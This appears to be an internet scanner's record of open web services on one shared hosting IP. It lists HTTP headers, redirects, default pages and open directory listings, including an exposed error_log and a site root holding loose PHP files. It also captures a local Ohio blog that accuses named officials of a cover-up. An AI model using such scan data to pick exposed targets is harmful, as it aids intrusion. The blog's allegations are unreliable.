    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="190867698">2026-01-06 02:48</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="11.php"><a href="/11.php"><img class="icon" src="/_autoindex/assets/icons/file-text.svg" alt="[TXT]">11.php</a></td><td data-sort="1767371933">2026-01-02 16:38</td><td data-sort="24434">     24k</td></tr>
    <tr><td data-sort="admin.php"><a href="/admin.php"><img class="icon" src="/_autoindex/assets/icons/file-text.svg" alt="[TXT]">admin.php</a></td><td data-sort="1762763910">2025-11-10 08:38</td><td data-sort="5362">      6k</td></tr>
    <tr><td data-sort="wp-blog-header.php"><a href="/wp-blog-header.php"><img class="icon" src="/_autoindex/assets/icons/file-text.svg" alt="[TXT]">wp-blog-header.php</a></td><td data-sort="1767667697">2026-01-06 02:48</td><td data-sort="2831">      3k</td></tr>
    <tr><td data-sort="wp-cron.php"><a href="/wp-cron.php"><img class="icon" src="/_autoindex/assets/icons/file-text.svg" alt="[TXT]">wp-cron.php</a></td><td data-sort="1767667697">2026-01-06 02:48</td><td data-sort="2831">      3k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.herbglow.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.carelinkacademy.com

    2026-01-08 22:44

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 08 Jan 2026 22:44:11 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · bestdevicenation.com

    2026-01-08 22:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1598
    date: Thu, 08 Jan 2026 22:35:23 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="182461095">2025-09-30 19:38</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="error_log"><a href="/error_log"><img class="icon" src="/_autoindex/assets/icons/file.svg" alt="File">error_log</a></td><td data-sort="1761131958">2025-10-22 11:19</td><td data-sort="2242">      3k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at bestdevicenation.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nexashophub.online

    2026-01-08 22:29

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 08 Jan 2026 22:30:00 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · nexuxtalentpartner.site

    2026-01-08 22:17

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 08 Jan 2026 22:17:07 GMT
    server: LiteSpeed
    location: https://nexuxtalentpartner.site/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · walchakpouredwalls.com

    2026-01-08 22:09

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://walchakpouredwalls.com/wp-json/>; rel="https://api.w.org/"
    link: <https://walchakpouredwalls.com/wp-json/wp/v2/pages/99>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://walchakpouredwalls.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Thu, 08 Jan 2026 22:09:08 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.testnews.cdcit.in

    2026-01-08 21:38

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 08 Jan 2026 21:38:54 GMT
    server: LiteSpeed
    location: https://www.testnews.cdcit.in/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.nexuxtalentpartner.site

    2026-01-08 20:17

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 08 Jan 2026 20:18:00 GMT
    server: LiteSpeed
    location: https://www.nexuxtalentpartner.site/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · bokitas.devdecimosite2025.com

    2026-01-08 20:10

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1157
    date: Thu, 08 Jan 2026 20:10:48 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at bokitas.devdecimosite2025.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.drsat.net

    2026-01-08 19:39

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://drsat.net/
    x-litespeed-cache: miss
    content-length: 0
    date: Thu, 08 Jan 2026 19:39:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · modecart.store

    2026-01-08 19:11

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 08 Jan 2026 19:11:56 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rawgardenofficialstore.com

    2026-01-08 19:08

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 08 Jan 2026 19:08:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · goseguros.devdecimosite2025.com

    2026-01-08 19:04

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 08 Jan 2026 19:04:52 GMT
    server: LiteSpeed
    location: https://goseguros.devdecimosite2025.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rifaaps.devdecimosite2025.com

    2026-01-08 18:38

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://rifaaps.devdecimosite2025.com/
    x-litespeed-cache: hit
    content-length: 0
    date: Thu, 08 Jan 2026 18:39:02 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.rifaaps.devdecimosite2025.com

    2026-01-08 18:38

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: http://rifaaps.devdecimosite2025.com/
    x-litespeed-cache: hit
    content-length: 0
    date: Thu, 08 Jan 2026 18:39:02 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · rifaaps.devdecimosite2025.com

    2026-01-08 18:20

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://rifaaps.devdecimosite2025.com/index.php?rest_route=/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    date: Thu, 08 Jan 2026 18:20:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rifaaps.devdecimosite2025.com

    2026-01-08 18:20

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://rifaaps.devdecimosite2025.com/index.php?rest_route=/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    date: Thu, 08 Jan 2026 18:20:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadysideoh.org

    2026-01-08 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Thu, 08 Jan 2026 05:16:42 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.org/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadysideoh.org

    2026-01-08 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 03:39:58 GMT
    accept-ranges: bytes
    content-length: 10693
    date: Thu, 08 Jan 2026 05:16:42 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "master.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <!--link rel="stylesheet" href="styles/owl.carousel.min.css">
    <link rel="stylesheet" href="styles/owl.theme.default.min.css"-->
    <!-- #EndEditable -->
    <link href="styles/style0.css" media="screen" rel="stylesheet" title="CSS" type="text/css" />
    </head>
    
    <body>
    <div id="container">
    <div id="lftcontainer">
    	<img src="images/talia_open_roller_banner_21422-2.png" alt="Banner" width="160px" style="padding-top:20px"/>
    </div>
    <!-- Begin Container -->
    <div id="rtcontainer">
    	<!-- Begin Masthead -->
    	<div id="masthead" style="height: 84px">
    		<div id="mastlft">
    		<h1>ShadysideOh.Org</h1>
    		<h3>Shadyside, Ohio 43947</h3></div>
    		<div style="float:right">
    		<img alt="Banner" src="images/talia_open_roller_banner_21398.gif" height="96" width="74"/></div>
    		
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="Default.html">Home</a></li>
    			<!--li><a href="about_me/default.html">About Me</a></li-->
    			<!--li><a href="resume/default.html">R&eacute;sum&eacute;</a></li-->
    			<!--li><a href="photo_gallery/default.html">Photo Gallery</a></li-->
    			<!--li><a href="links/default.html">Links</a></li-->
    			<!--li><a href="contact/default.html">Contact</a></li-->
    		</ul>
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin content_container -->
    	<div id="content_container">
    		<!-- Begin Left Column -->
    		<div id="column_left">
    			<!-- #BeginEditable "content" -->
    			<h2 class="centercontent">Shadyside Voters(Lemmings)</h2>
    			<h3 class="centercontent">Going in Circles!</h3>
    			<p class="centercontent">
    			<img alt="Going in Circles" src="images/group_walk_in_circle_12967.gif" height="283" width="313" ></p>
    			<p>The November 6th election of 2018 had the Shadyside Village 
    			Renewal on the ballot. It passed with a 58% (812 for) to 42% (581 
    			against) ratio. Since 2013, that ratio has remained constant in all 
    			village levies. About 60% vote for the levy regardless how bad the 
    			village slips down the drain. It raises a question as to how aware 
    			the people who vote for the levies are. Are they just Lemmings that 
    			would jump off the cliff if the mayor said to?</p> 
    			
    			<p>Our pool has deteriorated and closed despite many villages around us having maintained and thrived with their pools. 
    			Our pool was one of the finest in the valley, but now it is trash and probably going to be given away for free to the school. 
    			An investigation should be made about the pool, it's closing and the connections to the new school and Haswell. 
    			Questions arise as to the timing of the closing and Haswell's 
    			studies for the new school and the relationship his wife has with 
    			the pool.</p>
    			<p>The water department is the worst offender in the list. They were 
    			being eaten alive for raised rates. Then, a major water line break 
    			occurred, reservoirs emptied and they became heroes. This diverted 
    			the anger swelling in the village. Odd, there was a new alarm 
    			connection for the reservoirs put in two years before. Staff should 
    			have been aware of the draining since most important systems have 
    			notifications by pager or other means.&nbsp; No one was held 
    			accountable for this cover-up. The superintendent should have been 
    			fired. </p>
    			<p class="centercontent">
    			<img alt="Lemmings" height="107" src="images/cliff_jump.gif" width="158"></p>
    			<p>Now, water rates have continued to rise without specifics given. 
    			Money was set aside in previous years for the new meters. Claims of 
    			the demand by the EPA just doesn't make sense. The EPA doesn't care 
    			about your water bills. It's just BULLSHIT excuses by the water 
    			board and the village. And there was a report that the department 
    			ordered the wrong meters and had to pay a significant penalty for 
    			replacing them. And finally on the subject of the water department, 
    			water is reportedly to go up again in January 2019 from a b
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · shadysideoh.org

    2026-01-08 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Thu, 08 Jan 2026 05:16:42 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.org/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shadysideoh.org

    2026-01-08 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 03:39:58 GMT
    accept-ranges: bytes
    content-length: 10693
    date: Thu, 08 Jan 2026 05:16:41 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "master.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <!--link rel="stylesheet" href="styles/owl.carousel.min.css">
    <link rel="stylesheet" href="styles/owl.theme.default.min.css"-->
    <!-- #EndEditable -->
    <link href="styles/style0.css" media="screen" rel="stylesheet" title="CSS" type="text/css" />
    </head>
    
    <body>
    <div id="container">
    <div id="lftcontainer">
    	<img src="images/talia_open_roller_banner_21422-2.png" alt="Banner" width="160px" style="padding-top:20px"/>
    </div>
    <!-- Begin Container -->
    <div id="rtcontainer">
    	<!-- Begin Masthead -->
    	<div id="masthead" style="height: 84px">
    		<div id="mastlft">
    		<h1>ShadysideOh.Org</h1>
    		<h3>Shadyside, Ohio 43947</h3></div>
    		<div style="float:right">
    		<img alt="Banner" src="images/talia_open_roller_banner_21398.gif" height="96" width="74"/></div>
    		
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="Default.html">Home</a></li>
    			<!--li><a href="about_me/default.html">About Me</a></li-->
    			<!--li><a href="resume/default.html">R&eacute;sum&eacute;</a></li-->
    			<!--li><a href="photo_gallery/default.html">Photo Gallery</a></li-->
    			<!--li><a href="links/default.html">Links</a></li-->
    			<!--li><a href="contact/default.html">Contact</a></li-->
    		</ul>
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin content_container -->
    	<div id="content_container">
    		<!-- Begin Left Column -->
    		<div id="column_left">
    			<!-- #BeginEditable "content" -->
    			<h2 class="centercontent">Shadyside Voters(Lemmings)</h2>
    			<h3 class="centercontent">Going in Circles!</h3>
    			<p class="centercontent">
    			<img alt="Going in Circles" src="images/group_walk_in_circle_12967.gif" height="283" width="313" ></p>
    			<p>The November 6th election of 2018 had the Shadyside Village 
    			Renewal on the ballot. It passed with a 58% (812 for) to 42% (581 
    			against) ratio. Since 2013, that ratio has remained constant in all 
    			village levies. About 60% vote for the levy regardless how bad the 
    			village slips down the drain. It raises a question as to how aware 
    			the people who vote for the levies are. Are they just Lemmings that 
    			would jump off the cliff if the mayor said to?</p> 
    			
    			<p>Our pool has deteriorated and closed despite many villages around us having maintained and thrived with their pools. 
    			Our pool was one of the finest in the valley, but now it is trash and probably going to be given away for free to the school. 
    			An investigation should be made about the pool, it's closing and the connections to the new school and Haswell. 
    			Questions arise as to the timing of the closing and Haswell's 
    			studies for the new school and the relationship his wife has with 
    			the pool.</p>
    			<p>The water department is the worst offender in the list. They were 
    			being eaten alive for raised rates. Then, a major water line break 
    			occurred, reservoirs emptied and they became heroes. This diverted 
    			the anger swelling in the village. Odd, there was a new alarm 
    			connection for the reservoirs put in two years before. Staff should 
    			have been aware of the draining since most important systems have 
    			notifications by pager or other means.&nbsp; No one was held 
    			accountable for this cover-up. The superintendent should have been 
    			fired. </p>
    			<p class="centercontent">
    			<img alt="Lemmings" height="107" src="images/cliff_jump.gif" width="158"></p>
    			<p>Now, water rates have continued to rise without specifics given. 
    			Money was set aside in previous years for the new meters. Claims of 
    			the demand by the EPA just doesn't make sense. The EPA doesn't care 
    			about your water bills. It's just BULLSHIT excuses by the water 
    			board and the village. And there was a report that the department 
    			ordered the wrong meters and had to pay a significant penalty for 
    			replacing them. And finally on the subject of the water department, 
    			water is reportedly to go up again in January 2019 from a b
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shadysideoh.net

    2026-01-08 05:15

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 03:48:15 GMT
    accept-ranges: bytes
    content-length: 8930
    date: Thu, 08 Jan 2026 05:15:30 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "dwt/site.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <!-- #EndEditable -->
    <!-- #BeginEditable "headsection" -->
    <meta content="Another blog about Shadyside" name="description" />
    <meta content="Shadyside" name="keywords" />
    <style type="text/css">
    
    .newStyle1 {
    	font-family: "Comic Sans MS";
    }
    </style>
    
    <!-- #EndEditable -->
    <meta content="en-us" http-equiv="Content-Language" />
    <meta content="General" name="rating" />
    <meta content="no" http-equiv="imagetoolbar" />
    <meta content="Copyright © 2018, ShadysideOh.com/. All Rights Reserved" name="copyright" />
    <link href="styles/site.css" rel="stylesheet" type="text/css" />
    </head>
    
    <body>
    
    <!-- Page Container begins here -->
    <div id="outerWrapper">
    	<!-- Masthead begins here -->
    	<div id="header">
    		<h1 class="title">ShadysideOh.net</h1>
    			
    		<img alt="Man in T-shirt" class="image" height="101" src="images/figure_in_custom_shirt_19367.png" width="103" /></div>
    	<!-- Masthead ends here -->
    	<!-- Navigation begins here -->
    	<div id="topNavigation">
    		<ul>
    			<li><a href="Default.html">Home</a></li>
    			<!--li><a href="../about.html" title="About">About</a></li-->
    			<!--li><a href="../contact.html" title="Contact">Contact</a></li-->
    			<!--li><a href="../links.html" title="Links">Links</a></li-->
    			<!--li><a href="../search.html" title="Search My Site.">Search</a></li-->
    			<!--li><a href="../site-map.html" title="Site Map">Site Map</a></li-->
    		</ul>
    	</div>
    	<!-- Navigation ends here -->
    	<!-- Content Container begins here -->
    	<div id="contentWrapper">
    		<!-- Left Column begins here -->
    		<div id="leftColumn1">
    		<!-- #BeginEditable "ltcontent" -->	
    		<p></p>
    		<p style="text-align:center">
    					<a href="https://www.shadysideoh.org">
    					<img alt="Lemmings" src= "images/cliff_jump.gif" height="86" width="100" class="auto-style2"/></a></p>
    					<h4 class="CenterText"><a href="https://www.shadysideoh.org">Shadyside Lemmings</a></h4>
    		<p class="CenterText">A comment about the Levy passed in November.</p>
    		<p></p>
    			<!-- #EndEditable -->
    		</div>
    		<!-- Left Column ends here -->
    		<!-- Right Column begins here -->
    		<div id="rightColumn1">			
    		<!-- #BeginEditable "rtcontent" -->		
    		  <div>
    			<div style="text-align:center" ><img alt="reading paper" src="images/on_the_toilet_400_clr_6456.png" height="151" width="152"/></div>
    			<h2 style="text-align:center;padding-top:10px;padding-bottom:10px">Subscribe</h2>
    			<div class="newsletter" style="width: 198px"><p style="font-size:small;padding-left:3px;padding-right:3px">
    				It's here!. Subscribe to our 
    				newsletter and get the latest news directly in your inbox.</p>
    				<div style="text-align:center">
    					<button id="myBtn" >Subscribe</button>
    				</div>
    				<p>Click the 'Subscribe' button above. You will be taken to the 
    				site to subscribe. </p>
    			</div>
    			
    			<p></p>
    			<div style="text-align:center">
    				<p>Visit our sister sites.</p>
    				<a href="https://www.shadysideoh.org">
    					<img alt="Banner" src="images/talia_open_roller_banner_21398-2.gif" height="122" width="92" /></a>
    				<p style="font-weight:bold"><a style="color:orange" href="https://www.shadysideoh.org">ShadysideOh.org</a></p>
    			</div>
    			<p></p>
    			<div style="text-align:center">
    				<a href="https://www.shadysideoh.com">
    					<img alt="Writing" src="images/stick_figure_writing_with_black_pen_10885.png" height="205" width="154"/></a>
    				<p style="font-weight:bold"><a style="color:orange" href="https://www.shadysideoh.com">ShadysideOh.com</a></p>
    			</div>
    			<p></p>			
    			<div style="text-align:center">
    				<a href="https://www.shadyside43947.com">
    					<img alt="Street Sign" src="images/woman_construction_sign_19754-3.png" height="176" width="161"/></a>
    				<p style="font-weight:bold"><a style="color:orange" href="https://www.shadyside43947.com">Shadyside43947.com</a></p>
    			</div>
    		  </div>
    			
    			
    				
    			<!-- #EndEditable -->
    		</div>
    		<!-- Right Column ends here -->
    		<!-- Main Content begins
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · shadysideoh.net

    2026-01-08 05:15

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Thu, 08 Jan 2026 05:15:29 GMT
